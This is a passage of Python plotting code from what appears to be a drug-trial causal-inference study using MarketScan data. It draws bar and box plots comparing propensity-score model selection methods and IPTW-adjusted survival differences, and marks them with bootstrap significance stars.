# ax.plot([x2, x2, x, x], [y, y + d, y + d, y], c='#82A2D3') #c="black")
ax.text((l + r) / 2, y + 0.6 * d, significance(psmd[i]), ha='center', va='bottom', fontsize=13)
# auc v.s. smd
l, r = x1, x2 + 0.4 * w
ax.plot([l, l, (l + r) / 2], [y, y + d, y + d], lw=1.2, c=colors[0] if colorful else 'black')
ax.plot([(l + r) / 2, r, r], [y + d, y + d, y], lw=1.2, c=colors[1] if colorful else 'black')
# ax.plot([x1, x1, x, x], [y+2*d, y+3*d, y+3*d, y+2*d], c='#FAC200') #c="black")
ax.text((l + r) / 2, y + .6 * d, significance(paucsmd[i]), ha='center', va='bottom', fontsize=13)
# ax.set_title('Success Rate of Balancing by Different PS Model Selection Methods')
ax.legend((rects1[0], rects2[0], rects3[0]), ('Val-AUC Select', 'Val-SMD Select', 'Our Strategy'),
fontsize=25) # , bbox_to_anchor=(1.13, 1.01))
# ax.autoscale(enable=True, axis='x', tight=True)
ax.set_xmargin(0.01)
plt.tight_layout()
if dump:
check_and_mkdir(dirname + 'results/fig/')
fig.savefig(dirname + 'results/fig/balance_rate_barplot-{}-{}.png'.format(model, contrl_type))
fig.savefig(dirname + 'results/fig/balance_rate_barplot-{}-{}.pdf'.format(model, contrl_type))
plt.show()
# plt.clf()
plt.close()
def bar_plot_model_selectionV2(cohort_dir_name, model, contrl_type='random', dump=True, colorful=True):
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
dfall = pd.read_excel(dirname + 'results/summarized_model_selection_{}-More.xlsx'.format(model),
sheet_name=contrl_type)
idx = dfall['success_rate-trainval_final_finalnsmd'] >= MIN_SUCCESS_RATE
idx_auc = dfall['success_rate-val_auc_nsmd'] >= MIN_SUCCESS_RATE
idx_smd = dfall['success_rate-val_maxsmd_nsmd'] >= MIN_SUCCESS_RATE
print('Total drug trials: ', len(idx))
print(r"#df['success_rate-trainval_final_finalnsmd'] > 0: ", idx.sum(), '({:.2f}%)'.format(idx.mean() * 100))
print(r"#df['success_rate-val_auc_nsmd'] > 0: ", idx_auc.sum(), '({:.2f}%)'.format(idx_auc.mean() * 100))
print(r"#df['success_rate-val_maxsmd_nsmd'] > 0: ", idx_smd.sum(), '({:.2f}%)'.format(idx_smd.mean() * 100))
df = dfall.loc[idx, :].sort_values(by=['success_rate-trainval_final_finalnsmd'], ascending=[False])
# df['nsmd_mean_ci-val_auc_nsmd']
N = len(df)
col = ['success_rate-val_auc_nsmd', 'success_rate-val_maxsmd_nsmd', 'success_rate-val_nsmd_nsmd',
'success_rate-train_maxsmd_nsmd', 'success_rate-train_nsmd_nsmd',
'success_rate-trainval_maxsmd_nsmd', 'success_rate-trainval_nsmd_nsmd',
'success_rate-trainval_final_finalnsmd']
legs = ['_'.join(x.split('-')[1].split('_')[:-1]) for x in col]
# col_ci = [x.replace('rate', 'rate_ci') for x in col]
top = []
top_ci = []
for c in col:
top.append(df.loc[:, c])
top_ci.append(np.array(df.loc[:, c.replace('rate', 'rate_ci')].apply(lambda x: stringlist_2_list(x)).to_list()))
pauc = np.array(df.loc[:, "p-succes-final-vs-auc"])
psmd = np.array(df.loc[:, "p-succes-final-vs-maxsmd"])
paucsmd = np.array(df.loc[:, "p-succes-auc-vs-maxsmd"])
xlabels = df.loc[:, 'drug_name']
width = 0.45 # the width of the bars
ind = np.arange(N) * width * (len(col) + 1) # the x locations for the groups
colors = ['#FAC200', '#82A2D3', '#F65453']
fig, ax = plt.subplots(figsize=(24, 8))
error_kw = {'capsize': 3, 'capthick': 1, 'ecolor': 'black'}
# plt.ylim([0, 1.05])
rects = []
for i in range(len(top)):
top_1 = top[i]
top_1_ci = top_ci[i]
if i <= 1 or i == len(top) - 1:
rect = ax.bar(ind + width * i, top_1, width, yerr=[top_1 - top_1_ci[:, 0], top_1_ci[:, 1] - top_1],
error_kw=error_kw,
color=colors[min(i, len(colors) - 1)], edgecolor=None) # "black")
else:
rect = ax.bar(ind + width * i, top_1, width, yerr=[top_1 - top_1_ci[:, 0], top_1_ci[:, 1] - top_1],
error_kw=error_kw,
edgecolor="black")
rects.append(rect)
ax.set_xticks(ind + int(len(top) / 2) * width)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
# ax.spines['bottom'].set_color('#DDDDDD')
ax.set_axisbelow(True)
ax.yaxis.set_minor_locator(tck.AutoMinorLocator())
ax.yaxis.grid(True, color='#EEEEEE', which='both')
ax.xaxis.grid(False)
ax.set_xticklabels(xlabels, fontsize=20, rotation=45, ha='right')
ax.tick_params(axis='both', which='major', labelsize=20)
ax.set_xlabel("Drug Trials", fontsize=25)
ax.set_ylabel("Prop. of success balancing", fontsize=25) # Success Rate of Balancing
def significance(val):
if val < 0.001:
return '***'
elif val < 0.01:
return '**'
elif val < 0.05:
return '*'
else:
return 'ns'
def labelvalue(rects, val, height=None):
for i, rect in enumerate(rects):
if height is None:
h = rect.get_height() * 1.02
else:
h = height[i] * 1.02
ax.text(rect.get_x() + rect.get_width() / 2., h,
significance(val[i]),
ha='center', va='bottom', fontsize=11)
for i in range(len(rects) - 1):
pv = np.array(df.loc[:, "p-succes-fvs-" + col[i].split('-')[-1]])
labelvalue((rects[i]), pv, top_ci[i][:, 1])
# labelvalue(rects1, pauc, top_1_ci[:,1])
# labelvalue(rects2, psmd, top_2_ci[:,1])
# for i, rect in enumerate(rects3):
# d = 0.02
# y = top_3_ci[i, 1] * 1.03 # rect.get_height()
# w = rect.get_width()
# x = rect.get_x()
# x1 = x - 2 * w
# x2 = x - 1 * w
#
# y1 = top_1_ci[i, 1] * 1.03
# y2 = top_2_ci[i, 1] * 1.03
#
# # auc v.s. final
# l, r = x1, x + w
# ax.plot([l, l, (l+r) / 2], [y + 2 * d, y + 3 * d, y + 3 * d], lw=1.2, c=colors[0] if colorful else 'black')
# ax.plot([(l+r) / 2, r, r], [y + 3 * d, y + 3 * d, y + 2 * d], lw=1.2, c=colors[2] if colorful else 'black')
# # ax.plot([x1, x1, x, x], [y+2*d, y+3*d, y+3*d, y+2*d], c='#FAC200') #c="black")
# ax.text((l+r) / 2, y + 2.6 * d, significance(pauc[i]), ha='center', va='bottom', fontsize=13)
#
# # smd v.s. final
# l, r = x2 + 0.6*w, x + w
# ax.plot([l, l, (l + r) / 2], [y, y + d, y + d], lw=1.2, c=colors[1] if colorful else 'black')
# ax.plot([(l + r) / 2, r, r], [y + d, y + d, y], lw=1.2, c=colors[2] if colorful else 'black')
# # ax.plot([x2, x2, x, x], [y, y + d, y + d, y], c='#82A2D3') #c="black")
# ax.text((l + r) / 2, y + 0.6 * d, significance(psmd[i]), ha='center', va='bottom', fontsize=13)
#
# # auc v.s. smd
# l, r = x1, x2 + 0.4*w
# ax.plot([l, l, (l + r) / 2], [y, y + d, y + d], lw=1.2, c=colors[0] if colorful else 'black')
# ax.plot([(l + r) / 2, r, r], [y + d, y + d, y], lw=1.2, c=colors[1] if colorful else 'black')
# # ax.plot([x1, x1, x, x], [y+2*d, y+3*d, y+3*d, y+2*d], c='#FAC200') #c="black")
# ax.text((l + r) / 2, y + .6 * d, significance(paucsmd[i]), ha='center', va='bottom', fontsize=13)
# ax.set_title('Success Rate of Balancing by Different PS Model Selection Methods')
ax.legend((rect[0] for rect in rects), (x for x in legs),
fontsize=18) # , bbox_to_anchor=(1.13, 1.01))
# ax.autoscale(enable=True, axis='x', tight=True)
ax.set_xmargin(0.01)
plt.tight_layout()
if dump:
check_and_mkdir(dirname + 'results/fig/')
fig.savefig(dirname + 'results/fig/balance_rate_barplot-{}-{}-all.png'.format(model, contrl_type))
fig.savefig(dirname + 'results/fig/balance_rate_barplot-{}-{}-all.pdf'.format(model, contrl_type))
plt.show()
plt.clf()
def box_plot_model_selection(cohort_dir_name, model, contrl_type='random', dump=True, colorful=True):
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
dfall = pd.read_excel(dirname + 'results/summarized_model_selection_{}.xlsx'.format(model),
sheet_name=contrl_type, converters={'drug': str})
idx = dfall['success_rate-trainval_final_finalnsmd'] >= MIN_SUCCESS_RATE # 0.1
idx_auc = dfall['success_rate-val_auc_nsmd'] >= MIN_SUCCESS_RATE # 0.1
idx_smd = dfall['success_rate-val_maxsmd_nsmd'] >= MIN_SUCCESS_RATE # 0.1
print('Total drug trials: ', len(idx))
print(r"#df['success_rate-trainval_final_finalnsmd'] > 0: ", idx.sum(), '({:.2f}%)'.format(idx.mean() * 100))
print(r"#df['success_rate-val_auc_nsmd'] > 0: ", idx_auc.sum(), '({:.2f}%)'.format(idx_auc.mean() * 100))
print(r"#df['success_rate-val_maxsmd_nsmd'] > 0: ", idx_smd.sum(), '({:.2f}%)'.format(idx_smd.mean() * 100))
df = dfall.loc[idx, :].sort_values(by=['success_rate-trainval_final_finalnsmd'], ascending=[False])
# df['nsmd_mean_ci-val_auc_nsmd']
N = len(df)
drug_list = df.loc[idx, 'drug']
drug_name_list = df.loc[idx, 'drug_name']
drug_name_list = [s[:18] for s in drug_name_list]
data_1 = []
data_2 = []
data_3 = []
data_pvalue = []
for drug in drug_list:
rdf = pd.read_csv(dirname + 'results/' + drug + '_model_selection.csv')
if contrl_type != 'all':
idx = rdf['ctrl_type'] == contrl_type
else:
idx = rdf['ctrl_type'].notna()
data_1.append(np.array(rdf.loc[idx, "val_auc_testauc"]))
data_2.append(np.array(rdf.loc[idx, "val_maxsmd_testauc"]))
data_3.append(np.array(rdf.loc[idx, "trainval_final_testnauc"]))
p1, test_orig1 = bootstrap_mean_pvalue_2samples(data_3[-1], data_1[-1])
p2, test_orig2 = bootstrap_mean_pvalue_2samples(data_3[-1], data_2[-1])
p3, test_orig3 = bootstrap_mean_pvalue_2samples(data_1[-1], data_2[-1])
# test_orig1_man = stats.mannwhitneyu(data_3[-1], data_1[-1])
# test_orig2_man = stats.mannwhitneyu(data_3[-1], data_2[-1])
data_pvalue.append([test_orig1[1], test_orig2[1], test_orig3[1]])
colors = ['#FAC200', '#82A2D3', '#F65453']
fig, ax = plt.subplots(figsize=(45, 8)) #(18, 8)
width = 0.3 # 0.5 # the width of the bars
ind = np.arange(N) * width * 4 # the x locations for the groups
sym = 'o'
# 'meanline':True,
box_kw = {"sym": sym, "widths": width, "patch_artist": True, "notch": True,
'showmeans': True, # 'meanline':True,
"meanprops": dict(linestyle='--', linewidth=1, markeredgecolor='purple', marker='^',
markerfacecolor="None")}
rects1 = plt.boxplot(data_1, positions=ind - 0.08, **box_kw)
rects2 = plt.boxplot(data_2, positions=ind + width, **box_kw)
rects3 = plt.boxplot(data_3, positions=ind + 2 * width + 0.08, **box_kw)
def plot_strip(ind, data, color):
w = width - 0.15
swarm1 = pd.DataFrame([(ind[i], data[i][j]) for i in range(len(ind)) for j in range(len(data[i]))],
columns=['x', 'y'])
strip_rx = stats.uniform(-w / 2., w).rvs(len(swarm1))
# sns.stripplot(x='x', y='y', data=swarm1, color=".25", alpha=0.2, ax=ax)
plt.scatter(swarm1['x'] + strip_rx, swarm1['y'], alpha=0.2, c=color)
# ticks = list(drug_name_list)
for i, bplot in enumerate([rects1, rects2, rects3]):
for patch in bplot['boxes']:
patch.set_facecolor(colors[i])
r, g, b, a = patch.get_facecolor()
patch.set_facecolor((r, g, b, .7))
# plt.setp(bplot['boxes'], color=color)
# plt.setp(bplot['whiskers'], color=color)
# plt.setp(bplot['caps'], color=color)
plt.setp(bplot['medians'], color='black')
plot_strip(ind - 0.08, data_1, colors[0])
plot_strip(ind + width, data_2, colors[1])
plot_strip(ind + 2 * width + 0.08, data_3, colors[2])
# plt.ylim([0.5, 0.85])
ax.set_xticks(ind + width)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
# ax.spines['bottom'].set_color('#DDDDDD')
ax.set_axisbelow(True)
ax.yaxis.set_minor_locator(tck.AutoMinorLocator())
ax.yaxis.grid(True, color='#EEEEEE', which='both')
ax.xaxis.grid(False)
ax.set_xticklabels(drug_name_list, fontsize=20, rotation=45, ha='right')
ax.tick_params(axis='both', which='major', labelsize=20)
ax.set_xlabel("Drug Trials", fontsize=25)
ax.set_ylabel("Test AUC", fontsize=25)
def significance(val):
if val < 0.001:
return '***'
elif val < 0.01:
return '**'
elif val < 0.05:
return '*'
else:
return 'ns'
# def labelvalue(rects, x, y, p):
# for i, rect in enumerate(rects):
# ax.text(x[i], y[i],
# significance(p[i]),
# ha='center', va='bottom', fontsize=11)
#
# labelvalue(rects1["boxes"], ind - 0.08, np.max(data_1, axis=1)*1.01, np.array(data_pvalue)[:,0])
# labelvalue(rects2["boxes"], ind + width, np.max(data_2, axis=1)*1.01, np.array(data_pvalue)[:,1])
p_v = np.array(data_pvalue)
for i in range(N):
d = 0.008
y = np.max([data_1[i].max(), data_2[i].max(), data_3[i].max()]) * 1.01 # rect.get_height()
x = ind[i] + 2 * width + 0.08 # + width/2
x1 = ind[i] - 0.08 # - width/2
x2 = ind[i] + width # - width/2
# auc v.s. smd
l, r = x - 0.5 * width, x2 - 0.08
ax.plot([x1, x1, (x2 + x1) / 2], [y, y + d, y + d], lw=1.2, c=colors[0] if colorful else 'black')
ax.plot([(x2 + x1) / 2, x2 - 0.08, x2 - 0.08], [y + d, y + d, y], lw=1.2, c=colors[1] if colorful else 'black')
ax.text((x2 + x1) / 2, y + d, significance(p_v[i, 2]), ha='center', va='bottom', fontsize=12)
# auc v.s. final
ax.plot([x1, x1, (x + x1) / 2], [y + 2 * d, y + 3 * d, y + 3 * d], lw=1.2, c=colors[0] if colorful else 'black')
ax.plot([(x + x1) / 2, x, x], [y + 3 * d, y + 3 * d, y + 2 * d], lw=1.2, c=colors[2] if colorful else 'black')
# ax.plot([x1, x1, x, x], [y+2*d, y+3*d, y+3*d, y+2*d], c="black")
ax.text((x + x1) / 2, y + 3 * d, significance(p_v[i, 0]), ha='center', va='bottom', fontsize=12)
# smd v.s. final
ax.plot([x2 + 0.08, x2 + 0.08, (x + x2) / 2], [y, y + d, y + d], lw=1.2, c=colors[1] if colorful else 'black')
ax.plot([(x + x2) / 2, x, x], [y + d, y + d, y], lw=1.2, c=colors[2] if colorful else 'black')
# ax.plot([x2, x2, x, x], [y, y + d, y + d, y], c="black")
ax.text((x + x2) / 2, y + 1 * d, significance(p_v[i, 1]), ha='center', va='bottom', fontsize=12)
ax.legend((rects1["boxes"][0], rects2["boxes"][0], rects3["boxes"][0]),
('Val-AUC Select', 'Val-SMD Select', 'Our Strategy'),
fontsize=20)
ax.set_xmargin(0.01)
plt.tight_layout()
if dump:
check_and_mkdir(dirname + 'results/fig/')
fig.savefig(dirname + 'results/fig/test_auc_boxplot-{}-{}.png'.format(model, contrl_type))
fig.savefig(dirname + 'results/fig/test_auc_boxplot-{}-{}.pdf'.format(model, contrl_type))
plt.show()
plt.clf()
def box_plot_model_selectionV2(cohort_dir_name, model, contrl_type='random', dump=True, colorful=True):
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
dfall = pd.read_excel(dirname + 'results/summarized_model_selection_{}-More.xlsx'.format(model),
sheet_name=contrl_type, converters={'drug': str})
idx = dfall['success_rate-trainval_final_finalnsmd'] >= MIN_SUCCESS_RATE
idx_auc = dfall['success_rate-val_auc_nsmd'] >= MIN_SUCCESS_RATE
idx_smd = dfall['success_rate-val_maxsmd_nsmd'] >= MIN_SUCCESS_RATE
print('Total drug trials: ', len(idx))
print(r"#df['success_rate-trainval_final_finalnsmd'] > 0: ", idx.sum(), '({:.2f}%)'.format(idx.mean() * 100))
print(r"#df['success_rate-val_auc_nsmd'] > 0: ", idx_auc.sum(), '({:.2f}%)'.format(idx_auc.mean() * 100))
print(r"#df['success_rate-val_maxsmd_nsmd'] > 0: ", idx_smd.sum(), '({:.2f}%)'.format(idx_smd.mean() * 100))
df = dfall.loc[idx, :].sort_values(by=['success_rate-trainval_final_finalnsmd'], ascending=[False])
# df['nsmd_mean_ci-val_auc_nsmd']
N = len(df)
drug_list = df.loc[idx, 'drug']
drug_name_list = df.loc[idx, 'drug_name']
col = ['val_auc_testauc', 'val_maxsmd_testauc', 'val_nsmd_testauc',
'train_maxsmd_testauc', 'train_nsmd_testauc',
'trainval_maxsmd_testauc', 'trainval_nsmd_testauc',
'trainval_final_testnauc']
legs = ['_'.join(x.split('_')[:-1]) for x in col]
data_list = [[] for i in range(len(col))]
data_1 = []
data_2 = []
data_3 = []
data_pvalue = []
for drug in drug_list:
rdf = pd.read_csv(dirname + 'results/' + drug + '_model_selection.csv')
if contrl_type != 'all':
idx = rdf['ctrl_type'] == contrl_type
else:
idx = rdf['ctrl_type'].notna()
for i in range(len(col)):
data_list[i].append(np.array(rdf.loc[idx, col[i]]))
p_v = []
for i in range(1, len(col)):
a = data_list[0][-1]
b = data_list[i][-1]
p, test_orig = bootstrap_mean_pvalue_2samples(a, b)
p_v.append(test_orig[1])
data_pvalue.append(p_v)
colors = ['#FAC200', '#82A2D3', '#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#F65453']
# color_others = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22', '#17becf']
fig, ax = plt.subplots(figsize=(24, 8))
width = 0.5 # the width of the bars
ind = np.arange(N) * width * (len(col) + 1) # the x locations for the groups
sym = 'o'
# 'meanline':True,
box_kw = {"sym": sym, "widths": width - 0.08, "patch_artist": True, "notch": True,
'showmeans': True, # 'meanline':True,
"meanprops": dict(linestyle='--', linewidth=1, markeredgecolor='purple', marker='^',
markerfacecolor="None")}
rects = []
for i, data in enumerate(data_list):
rect = plt.boxplot(data, positions=ind + i * width, **box_kw)
rects.append(rect)
def plot_strip(ind, data, color=None):
w = width - 0.15
swarm1 = pd.DataFrame([(ind[i], data[i][j]) for i in range(len(ind)) for j in range(len(data[i]))],
columns=['x', 'y'])
strip_rx = stats.uniform(-w / 2., w).rvs(len(swarm1))
# sns.stripplot(x='x', y='y', data=swarm1, color=".25", alpha=0.2, ax=ax)
if color is None:
plt.scatter(swarm1['x'] + strip_rx, swarm1['y'], alpha=0.2)
else:
plt.scatter(swarm1['x'] + strip_rx, swarm1['y'], alpha=0.2, c=color)
# ticks = list(drug_name_list)
for i, bplot in enumerate(rects):
for patch in bplot['boxes']:
patch.set_facecolor(colors[i])
r, g, b, a = patch.get_facecolor()
patch.set_facecolor((r, g, b, 0.7))
# plt.setp(bplot['boxes'], color=color)
# plt.setp(bplot['whiskers'], color=color)
# plt.setp(bplot['caps'], color=color)
plt.setp(bplot['medians'], color='black')
for i, data in enumerate(data_list):
plot_strip(ind + i * width, data, colors[i])
# plt.ylim([0.5, 0.85])
ax.set_xticks(ind + int(len(col) / 2) * width)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
# ax.spines['bottom'].set_color('#DDDDDD')
ax.set_axisbelow(True)
ax.yaxis.set_minor_locator(tck.AutoMinorLocator())
ax.yaxis.grid(True, color='#EEEEEE', which='both')
ax.xaxis.grid(False)
ax.set_xticklabels(drug_name_list, fontsize=20, rotation=45, ha='right')
ax.tick_params(axis='both', which='major', labelsize=20)
ax.set_xlabel("Drug Trials", fontsize=25)
ax.set_ylabel("Test AUC", fontsize=25)
def significance(val):
if val < 0.001:
return '***'
elif val < 0.01:
return '**'
elif val < 0.05:
return '*'
else:
return 'ns'
# def labelvalue(rects, x, y, p):
# for i, rect in enumerate(rects):
# ax.text(x[i], y[i],
# significance(p[i]),
# ha='center', va='bottom', fontsize=11)
#
# labelvalue(rects1["boxes"], ind - 0.08, np.max(data_1, axis=1)*1.01, np.array(data_pvalue)[:,0])
# labelvalue(rects2["boxes"], ind + width, np.max(data_2, axis=1)*1.01, np.array(data_pvalue)[:,1])
p_v = np.array(data_pvalue)
for i in range(N):
d = 0.008
for j in range(1, len(col)):
y = data_list[j][i].max() * 1.01
x = ind[i] + j * width
ax.text(x, y + d, significance(p_v[i, j - 1]), ha='center', va='bottom', fontsize=9)
# y = np.max([data_1[i].max(), data_2[i].max(), data_3[i].max()]) * 1.01 # rect.get_height()
# x = ind[i] + 2 * width + 0.08 # + width/2
# x1 = ind[i] - 0.08 # - width/2
# x2 = ind[i] + width # - width/2
#
# # auc v.s. smd
# l, r = x - 0.5*width, x2 - 0.08
# ax.plot([x1, x1, (x2 + x1) / 2], [y, y + d, y + d], lw=1.2, c=colors[0] if colorful else 'black')
# ax.plot([(x2 + x1) / 2, x2 - 0.08, x2-0.08], [y + d, y + d, y], lw=1.2, c=colors[1] if colorful else 'black')
# ax.text((x2 + x1) / 2, y + d, significance(p_v[i, 2]), ha='center', va='bottom', fontsize=12)
#
# # auc v.s. final
# ax.plot([x1, x1, (x + x1) / 2], [y + 2 * d, y + 3 * d, y + 3 * d], lw=1.2, c=colors[0] if colorful else 'black')
# ax.plot([(x + x1) / 2, x, x], [y + 3 * d, y + 3 * d, y + 2 * d], lw=1.2, c=colors[2] if colorful else 'black')
# # ax.plot([x1, x1, x, x], [y+2*d, y+3*d, y+3*d, y+2*d], c="black")
# ax.text((x + x1) / 2, y + 3 * d, significance(p_v[i, 0]), ha='center', va='bottom', fontsize=12)
#
# # smd v.s. final
# ax.plot([x2+0.08, x2+0.08, (x + x2) / 2], [y, y + d, y + d], lw=1.2, c=colors[1] if colorful else 'black')
# ax.plot([(x + x2) / 2, x, x], [y + d, y + d, y], lw=1.2, c=colors[2] if colorful else 'black')
# # ax.plot([x2, x2, x, x], [y, y + d, y + d, y], c="black")
# ax.text((x + x2) / 2, y + 1 * d, significance(p_v[i, 1]), ha='center', va='bottom', fontsize=12)
ax.legend((rect["boxes"][0] for rect in rects),
(x for x in legs),
fontsize=15)
ax.set_xmargin(0.01)
plt.tight_layout()
if dump:
check_and_mkdir(dirname + 'results/fig/')
fig.savefig(dirname + 'results/fig/test_auc_boxplot-{}-{}-all.png'.format(model, contrl_type))
fig.savefig(dirname + 'results/fig/test_auc_boxplot-{}-{}-all.pdf'.format(model, contrl_type))
plt.show()
plt.clf()
def box_plot_ate(cohort_dir_name, model, model2='LSTM', contrl_type='random', dump=True, colorful=True):
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
dirname2 = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model2)
df_all = pd.read_excel(dirname + 'results/summarized_IPTW_ATE_{}.xlsx'.format(model),
dtype={'drug': str},
sheet_name=None)
df_all2 = pd.read_excel(dirname2 + 'results/summarized_IPTW_ATE_{}.xlsx'.format(model2),
dtype={'drug': str},
sheet_name=None)
df = df_all[contrl_type]
# Only select drugs with selection criteria trial
# 1. minimum support set 10, may choose 20 later
# 2. p value < 0.05
idx = (df['support'] >= MIN_SUPPORT) & (df['pvalue-KM1-0_IPTW'] <= 0.05)
df_sort = df.loc[idx, :].sort_values(by=['mean-KM1-0_IPTW'], ascending=[False])
df2 = df_all2[contrl_type]
idx2 = (df2['support'] >= MIN_SUPPORT) & (df2['pvalue-KM1-0_IPTW'] <= 0.05)
df_sort2 = df2.loc[idx2, :].sort_values(by=['mean-KM1-0_IPTW'], ascending=[False])
data_1 = []
data_2 = []
data_pvalue = []
drug_list = df_sort['drug'].tolist()
drug_name_list = df_sort['drug_name'].tolist()
drug_name_list = [s[:18] for s in drug_name_list]
drug_list2 = df_sort2['drug'].tolist()
print('len(drug_list):', len(drug_list), 'len(drug_list2)', len(drug_list2))
N = len(drug_list)
n_box = 2
for drug in drug_list:
rdf = pd.read_excel(dirname + 'results/' + drug + '_results.xlsx')
if contrl_type != 'all':
idx_all = (rdf['ctrl_type'] == contrl_type)
else:
idx_all = (rdf['ctrl_type'].notna())
# Only select balanced trial
idx = idx_all & (rdf['n_unbalanced_feature_IPTW'] <= MAX_NO_UNBALANCED_FEATURE)
c = "KM1-0_IPTW" # "ATE_original", "ATE_IPTW", "KM1-0_original", "KM1-0_IPTW", 'HR_ori', 'HR_IPTW'
nv = rdf.loc[idx, c]
data_1.append(np.array(rdf.loc[idx, c]) * 100)
rdf2 = pd.read_excel(dirname2 + 'results/' + drug + '_results.xlsx')
if contrl_type != 'all':
idx_all2 = (rdf['ctrl_type'] == contrl_type)
else:
idx_all2 = (rdf['ctrl_type'].notna())
# Only select balanced trial
idx2 = idx_all2 & (rdf2['n_unbalanced_feature_IPTW'] <= MAX_NO_UNBALANCED_FEATURE)
nv2 = rdf.loc[idx2, c]
if drug in drug_list2:
data_2.append(np.array(rdf2.loc[idx2, c]) * 100)
else:
data_2.append(np.array([]))
# if len(nv) > 0:
# med = IQR(nv)[0]
# iqr = IQR(nv)[1:]
#
# mean = nv.mean()
# mean_ci, _ = bootstrap_mean_ci(nv, alpha=0.05)
#
# if 'HR' in c:
# p, _ = bootstrap_mean_pvalue(nv, expected_mean=1)
# else:
# p, _ = bootstrap_mean_pvalue(nv, expected_mean=0)
#
# r.extend([med, iqr, mean, mean_ci, p])
# else:
# r.extend([np.nan, np.nan, np.nan, np.nan, np.nan])
colors = ['#F65453', '#82A2D3', '#FAC200']
fig, ax = plt.subplots(figsize=(38, 8))
width = 0.5 # the width of the bars
ind = np.arange(N) * width * (n_box + 1) # the x locations for the groups
sym = 'o'
# 'meanline':True,
box_kw = {"sym": sym, "widths": width - 0.04, "patch_artist": True, "notch": True,
'showmeans': True, # 'meanline':True,
"meanprops": dict(linestyle='--', linewidth=1, markeredgecolor='black', marker='^',
markerfacecolor="None")}
rects1 = plt.boxplot(data_1, positions=ind, **box_kw)
rects2 = plt.boxplot(data_2, positions=ind + width, **box_kw)
# rects3 = plt.boxplot(data_3, positions=ind + 2 * width + 0.08, **box_kw)
def plot_strip(ind, data, color):
w = width - 0.15
swarm1 = pd.DataFrame([(ind[i], data[i][j]) for i in range(len(ind)) for j in range(len(data[i]))],
columns=['x', 'y'])
strip_rx = stats.uniform(-w / 2., w).rvs(len(swarm1))
# sns.stripplot(x='x', y='y', data=swarm1, color=".25", alpha=0.2, ax=ax)
plt.scatter(swarm1['x'] + strip_rx, swarm1['y'], alpha=.6, c=color)
# plt.scatter(swarm1['x'] + strip_rx, swarm1['y'], alpha=1, facecolors='none', edgecolors=color) # c=color) #,
# ticks = list(drug_name_list)
for i, bplot in enumerate([rects1, rects2]):
for patch in bplot['boxes']:
patch.set_facecolor(colors[i])
r, g, b, a = patch.get_facecolor()
patch.set_facecolor((r, g, b, .6))
# plt.setp(bplot['boxes'], color=color)
# plt.setp(bplot['whiskers'], color=color)
# plt.setp(bplot['caps'], color=color)
plt.setp(bplot['medians'], color='black')
plot_strip(ind, data_1, colors[0])
plot_strip(ind + width, data_2, colors[1])
# plot_strip(ind + 2 * width + 0.08, data_3, colors[2])
# plt.ylim([0.5, 0.85])
ax.set_xticks(ind + width / 2)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
# ax.spines['bottom'].set_color('#DDDDDD')
ax.set_axisbelow(True)
ax.yaxis.set_minor_locator(tck.AutoMinorLocator())
ax.yaxis.grid(True, color='#EEEEEE', which='both')
ax.xaxis.grid(False)
ax.set_xticklabels(drug_name_list, fontsize=20, rotation=45, ha='right')
ax.tick_params(axis='both', which='major', labelsize=20)
ax.set_xlabel("Drug Trials", fontsize=25)
ax.set_ylabel("Adjusted survival difference %", fontsize=25)
plt.axhline(y=0., color='black', linestyle='--')
def significance(val):
if val < 0.001:
return '***'
elif val < 0.01:
return '**'
elif val < 0.05:
return '*'
else:
return 'ns'
for i in range(N):
n1 = len(data_1[i])
n2 = len(data_2[i])
y1 = max(data_1[i]) * 1.02
try:
y2 = max(data_2[i]) * 1.02
except:
y2 = y1
x1 = ind[i]
x2 = ind[i] + width
ax.text(x1, y1, str(n1), ha='center', va='bottom', fontsize=14)
ax.text(x2, y2, str(n2), ha='center', va='bottom', fontsize=14)
# def labelvalue(rects, x, y, p):
# for i, rect in enumerate(rects):
# ax.text(x[i], y[i],
# significance(p[i]),
# ha='center', va='bottom', fontsize=11)
#
# labelvalue(rects1["boxes"], ind - 0.08, np.max(data_1, axis=1)*1.01, np.array(data_pvalue)[:,0])
# labelvalue(rects2["boxes"], ind + width, np.max(data_2, axis=1)*1.01, np.array(data_pvalue)[:,1])
# p_v = np.array(data_pvalue)
# for i in range(N):
# d = 0.008
# y = np.max([data_1[i].max(), data_2[i].max(), data_3[i].max()]) * 1.01 # rect.get_height()
# x = ind[i] + 2 * width + 0.08 # + width/2
# x1 = ind[i] - 0.08 # - width/2
# x2 = ind[i] + width # - width/2
#
# # auc v.s. smd
# l, r = x - 0.5 * width, x2 - 0.08
# ax.plot([x1, x1, (x2 + x1) / 2], [y, y + d, y + d], lw=1.2, c=colors[0] if colorful else 'black')
# ax.plot([(x2 + x1) / 2, x2 - 0.08, x2 - 0.08], [y + d, y + d, y], lw=1.2, c=colors[1] if colorful else 'black')
# ax.text((x2 + x1) / 2, y + d, significance(p_v[i, 2]), ha='center', va='bottom', fontsize=12)
#
# # auc v.s. final
# ax.plot([x1, x1, (x + x1) / 2], [y + 2 * d, y + 3 * d, y + 3 * d], lw=1.2, c=colors[0] if colorful else 'black')
# ax.plot([(x + x1) / 2, x, x], [y + 3 * d, y + 3 * d, y + 2 * d], lw=1.2, c=colors[2] if colorful else 'black')
# # ax.plot([x1, x1, x, x], [y+2*d, y+3*d, y+3*d, y+2*d], c="black")
# ax.text((x + x1) / 2, y + 3 * d, significance(p_v[i, 0]), ha='center', va='bottom', fontsize=12)
#
# # smd v.s. final
# ax.plot([x2 + 0.08, x2 + 0.08, (x + x2) / 2], [y, y + d, y + d], lw=1.2, c=colors[1] if colorful else 'black')
# ax.plot([(x + x2) / 2, x, x], [y + d, y + d, y], lw=1.2, c=colors[2] if colorful else 'black')
